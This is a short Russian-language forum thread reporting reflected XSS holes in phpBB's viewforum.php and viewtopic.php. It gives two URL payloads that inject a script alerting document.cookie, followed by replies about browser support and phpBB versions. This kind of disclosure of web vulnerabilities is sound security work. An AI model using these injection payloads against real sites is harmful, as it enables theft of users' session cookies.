2 xss увидел в viewforum.php и viewtopic.php

viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&start=30

viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20
...

Хехе. Ради инетереса ты смотрел на какой версии тестировал + почему не написал в каких браузерах пашет а в каких нет? А так молодец! За старания свои + заслужил.

в эксплорере делал, а тестил на своём 2.0.6 форуме

в эксплорере делал, а тестил на своём 2.0.6 форуме
phpBB 2.0.6: Выпущена в 2002 редкая версия.
А если phpBB 2.0.16 www.ut'

Вообще-то уже 2.0.21 на дворе =)

DIAgen извеняюсь 2.0.16, не увидел.